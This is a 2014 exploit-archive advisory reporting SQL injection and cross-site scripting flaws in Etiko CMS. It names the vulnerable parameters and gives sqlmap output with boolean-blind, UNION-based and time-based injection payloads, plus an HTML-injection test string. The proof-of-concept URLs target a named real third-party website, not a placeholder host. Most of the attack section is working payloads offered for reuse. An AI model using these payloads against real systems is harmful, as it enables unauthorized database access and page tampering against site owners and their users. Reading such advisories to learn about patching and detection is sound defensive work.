Etiko CMS Cross Site Scripting / SQL Injection

Etiko CMS Cross Site Scripting / SQL Injection: Posted Oct 13, 2014; Authored by Renzi; Etiko CMS suffers from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | ae5e97fd5a4460b420bab6c641274ce2d3ecae25d087f90dfdd7de13e73e9528; Download | Favorite | View

Etiko CMS Cross Site Scripting / SQL Injection

# SQL Injection & XSS on Etiko CMS.

# Risk: High

# CWE number: CWE-89,CWE-79

# Date: 13/10/2014

# Vendor: www.etikweb.com

# Version: All

# Author: Felipe " Renzi " Gabriel

# Contact: renzi@linuxmail.org

# Tested on:  Windows 8  ; Chrome ; Sqlmap 1.0-dev-nongit-20140906

# Vulnerables Files: /index.php  & /loja/index.php

# Exploits: http://www.target.com/loja/index.php?page_id=19 [XSS] & [SQLi]

            http://www.target.com/index.php?article_id=16 [SQLi] & [XSS]
  
            


# PoC:      http://www.centrovegetariano.org/loja/index.php?page_id=19 

            http://www.centrovegetariano.org/index.php?article_id=16


--- "SQLI using SQLMAP."--- 
            
---
    Place: GET
    Parameter: page_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page_id=19' AND 3987=3987 AND 'Tulh'='Tulh

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: page_id=-5362' UNION ALL SELECT NULL,NULL,CONCAT(0x7175616f71,0x467a784a6e62664d5a79,0x716b756271)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: page_id=19' AND SLEEP(5) AND 'mntS'='mntS
---

---
    Place: GET
    Parameter: article_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=16' AND 8044=8044 AND 'yKZe'='yKZe

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: article_id=-2752' UNION ALL SELECT 60,60,60,60,60,60,CONCAT(0x7167687671,0x6d54706b774f4a6f667a,0x7172707a71),60,60,60#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=16' AND SLEEP(5) AND 'MDwY'='MDwY
---



--- " XSS using HTML injection."---

      http://www.centrovegetariano.org/loja/index.php?page_id=19"><marquee>XSS</marquee>

      http://www.centrovegetariano.org/index.php?article_id=16"><marquee>XSS</marquee>

  

# Thank's

Top Authors In Last 30 Days

Red Hat 259 files
Ubuntu 85 files
Gentoo 29 files
indoushka 26 files
Debian 11 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
S. Dietz 2 files
Google Security Research 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

Etiko CMS Cross Site Scripting / SQL Injection

Etiko CMS Cross Site Scripting / SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Etiko CMS Cross Site Scripting / SQL Injection

Share This

Etiko CMS Cross Site Scripting / SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems